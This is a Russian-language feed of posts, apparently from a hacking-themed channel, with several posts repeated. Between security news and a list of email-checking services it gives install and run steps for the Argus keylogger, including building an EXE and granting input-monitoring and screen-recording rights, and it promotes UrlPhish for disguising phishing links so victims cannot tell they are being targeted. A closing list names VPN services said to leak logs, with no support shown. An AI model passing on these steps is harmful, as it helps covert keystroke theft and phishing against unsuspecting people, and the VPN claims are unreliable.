У Parrot OS на сайте вышел свежий образ Parrot-security-4.11.1_virtual.ova
https://www.parrotsec.org/virtual/
https://www.parrotsec.org/virtual/
Память DDR4 оказалась уязвимой для атак через браузер с помощью простого эксплойта на JavaScript
https://3dnews.ru/1037402/pamyat-ddr4-okazalas-uyazvimoy-dlya-atak-cherez-brauzer-s-pomoshchyu-prosto-eksployta-na-javascript
https://3dnews.ru/1037402/pamyat-ddr4-okazalas-uyazvimoy-dlya-atak-cherez-brauzer-s-pomoshchyu-prosto-eksployta-na-javascript
3DNews - Daily Digital Digest
Память DDR4 оказалась уязвимой для атак через браузер с помощью простого эксплойта на JavaScript
Ещё в 2014 году выяснилось, что компьютерная память уязвима для особого вида атак, получивших название Rowhammer.
Защищаемся от заражения через email
Рассылка спама с вредоносными вложениями — довольно популярный способ распространения различных вирусов и заражения компьютеров пользователей в интернете. Зачастую, вредоносное письмо можно распознать даже по названию. Но бывает, что оно очень хорошо замаскировано и нуждается в подробном анализе. Чтобы бы проверить входящую почту и ее вложения можно воспользоваться сервисами ниже.
1. Верифицируем адрес отправителя email:
https://centralops.net/co/emaildossier.aspx
https://2ip.ru/mail-checker/
http://ru.smart-ip.net/check-email/
https://ivit.pro/services/email-valid/ https://www.xverify.com/
https://mailvalidator.ru/
https://www.zerobounce.net/
https://www.emailmarker.com/
https://quickemailverification.com/
https://emailrep.io/
2. Удостоверяемся в соответствии доменного имени отправителя email:
https://2ip.ru/whois/
http://www.ripn.su/nic/whois/
https://whoer.net/ru/checkwhois
http://www.securrity.ru/whoiz.html
3. Оцениваем безопасность гиперссылок в email:
https://scanurl.net/
https://longurl.info/
https://vms.drweb.ru/online/
https://virusdesk.kaspersky.ru/
https://opentip.kaspersky.com/
4. Анализируем вложенные файлы в "песочницах":
https://cuckoo.cert.ee/
https://www.hybrid-analysis.com/
https://any.run/
Рассылка спама с вредоносными вложениями — довольно популярный способ распространения различных вирусов и заражения компьютеров пользователей в интернете. Зачастую, вредоносное письмо можно распознать даже по названию. Но бывает, что оно очень хорошо замаскировано и нуждается в подробном анализе. Чтобы бы проверить входящую почту и ее вложения можно воспользоваться сервисами ниже.
1. Верифицируем адрес отправителя email:
https://centralops.net/co/emaildossier.aspx
https://2ip.ru/mail-checker/
http://ru.smart-ip.net/check-email/
https://ivit.pro/services/email-valid/ https://www.xverify.com/
https://mailvalidator.ru/
https://www.zerobounce.net/
https://www.emailmarker.com/
https://quickemailverification.com/
https://emailrep.io/
2. Удостоверяемся в соответствии доменного имени отправителя email:
https://2ip.ru/whois/
http://www.ripn.su/nic/whois/
https://whoer.net/ru/checkwhois
http://www.securrity.ru/whoiz.html
3. Оцениваем безопасность гиперссылок в email:
https://scanurl.net/
https://longurl.info/
https://vms.drweb.ru/online/
https://virusdesk.kaspersky.ru/
https://opentip.kaspersky.com/
4. Анализируем вложенные файлы в "песочницах":
https://cuckoo.cert.ee/
https://www.hybrid-analysis.com/
https://any.run/
Argus - Продвинутый кейлоггер для macOS и Windows
Аргус удаленный и локальный кейлоггер Python
Кейлоггер с множеством функций созданный для macOS и Windows
Инструкция по установке на Windows
Первый вариант с использованием pyinstaller
Второй вариант с помощью приложения NSIS
Просто скачайте приложение NSIS с официального сайта и установите его
▫️ запустите приложение NSIS от имени администратора
▫️нажмите кнопку Установить на основе ZIP файла
▫️сожмите сценарий, который вы хотите преобразовать, и откройте или перетащите его в приложение NSIS
▫️нажмите кнопку Создать, и это создаст формат файла .EXE на основе скрипта
Установка на macOS
Перейдите в раздел Системные настройки -> безопасность и конфиденциальность -> конфиденциальность -> разблокировать изменения -> входной мониторинг и включение
Сделайте тот же шаг для записи экрана
Используя ARGUS, вы соглашаетесь с GNU General Public License v2.0, включенной в репозиторий. Для получения более подробной информации здесь. Использование "Аргуса" для нападения на цели без предварительного взаимного согласия незаконно. Конечный пользователь несет ответственность за соблюдение всех применимых местных, государственных и федеральных законов. Разработчики не несут никакой ответственности и не несут ответственности за любое неправильное использование или ущерб, причиненный этой программой.
Аргус удаленный и локальный кейлоггер Python
Кейлоггер с множеством функций созданный для macOS и Windows
Инструкция по установке на Windows
git clone https://github.com/ALDON94/argus.git
cd Argus/Windows/bin/Local or cd Argus/Windows/bin/Remote
pip3 install -r requirements.txt
python3 win-local.py or python3 win-remote.py
Хотите конвертировать скрипт в формат. EXE? Есть два способа, которыми вы можете пойти на этоПервый вариант с использованием pyinstaller
pip3 install pyinstaller
pyinstaller --onefile filename [this is gonna take a while be patient]
Когда это будет сделано, он будет упаковывать кучу папок, пропускать их и просматривать папку dist, которую вы должны увидеть .Формат EXE файла на основе скриптаВторой вариант с помощью приложения NSIS
Просто скачайте приложение NSIS с официального сайта и установите его
▫️ запустите приложение NSIS от имени администратора
▫️нажмите кнопку Установить на основе ZIP файла
▫️сожмите сценарий, который вы хотите преобразовать, и откройте или перетащите его в приложение NSIS
▫️нажмите кнопку Создать, и это создаст формат файла .EXE на основе скрипта
Установка на macOS
git clone https://github.com/ALDON94/argus.git
cd Argus/macos/bin/Local or cd Argus/macos/bin/Remote
pip3 install -r requirements.txt
Включите мониторинг ввода данных для любого приложения из которого вы запускаете скрипт.Перейдите в раздел Системные настройки -> безопасность и конфиденциальность -> конфиденциальность -> разблокировать изменения -> входной мониторинг и включение
Сделайте тот же шаг для записи экрана
sudo python3 osx-local.py or sudo python3 osx-remote.py [run it as root!]
Раскрытие информацииИспользуя ARGUS, вы соглашаетесь с GNU General Public License v2.0, включенной в репозиторий. Для получения более подробной информации здесь. Использование "Аргуса" для нападения на цели без предварительного взаимного согласия незаконно. Конечный пользователь несет ответственность за соблюдение всех применимых местных, государственных и федеральных законов. Разработчики не несут никакой ответственности и не несут ответственности за любое неправильное использование или ущерб, причиненный этой программой.
Как маскировать фишинг ссылки?
Наверное каждый подписчик нашего канала, знает , что такое "Ngrok" или "Serveo". Это некие "клиенты", которые позволяют туннелировать трафик, в интерне(а если нет, то можно и загуглить ;) ). Но подобные ссылки вызывают сильное подозрение, даже если вы её сжали.
UrlPhish - это утилита, которая может маскировать фишинг-ссылку достаточно хорошо, чтобы самый обычный юзер даже не смог догадаться, что его хотят взломать.
Установка:
▪️pkg update
▪️pkg upgrade
▪️pkg install git
▪️pkg install python
▪️git clone https://github.com/termux-lab/UrlPhish.git
▪️cd UrlPhish
Использование:
▪️python urlp.py
Выбираете сайт, указываете уже готовую фишинг ссылку, даёте ей нужное имя. Готово!
Наверное каждый подписчик нашего канала, знает , что такое "Ngrok" или "Serveo". Это некие "клиенты", которые позволяют туннелировать трафик, в интерне(а если нет, то можно и загуглить ;) ). Но подобные ссылки вызывают сильное подозрение, даже если вы её сжали.
UrlPhish - это утилита, которая может маскировать фишинг-ссылку достаточно хорошо, чтобы самый обычный юзер даже не смог догадаться, что его хотят взломать.
Установка:
▪️pkg update
▪️pkg upgrade
▪️pkg install git
▪️pkg install python
▪️git clone https://github.com/termux-lab/UrlPhish.git
▪️cd UrlPhish
Использование:
▪️python urlp.py
Выбираете сайт, указываете уже готовую фишинг ссылку, даёте ей нужное имя. Готово!
Xposed Framework на Android 11 или ниже, используя LSPposed (Полное руководство) - Hoow.ru
https://hoow.ru/ustanovite-lspposed-xposed-framework-na-android-11-ili-nizhe-rukovodstvo/
https://hoow.ru/ustanovite-lspposed-xposed-framework-na-android-11-ili-nizhe-rukovodstvo/
Hoow
Установите Xposed Framework на Android 11 или ниже, используя LSPposed (Полное руководство) - Hoow
Если вы с нетерпением ждете появления Xposed Framework на вашем устройстве, возможно, вам стоит обратить внимание на LSPposed. В этом руководстве я покажу вам, как установить LSPposed Xposed Framework на устройства под управлением Android 11, Android 10,…
Список VPN сервисов, которые сливают ваши логи.
НЕ ИСПОЛЬЗОВАТЬ ЭТИ СЕРВИСЫ
UFO VPN, FAST VPN, Free VPN, Super VPN, Flash VPN, Secure VPN, Rabbit VPN, HideMyAss, iVPN, HideME, inCloak, EarthVPN, PureVPN.
НЕ ИСПОЛЬЗОВАТЬ ЭТИ СЕРВИСЫ
UFO VPN, FAST VPN, Free VPN, Super VPN, Flash VPN, Secure VPN, Rabbit VPN, HideMyAss, iVPN, HideME, inCloak, EarthVPN, PureVPN.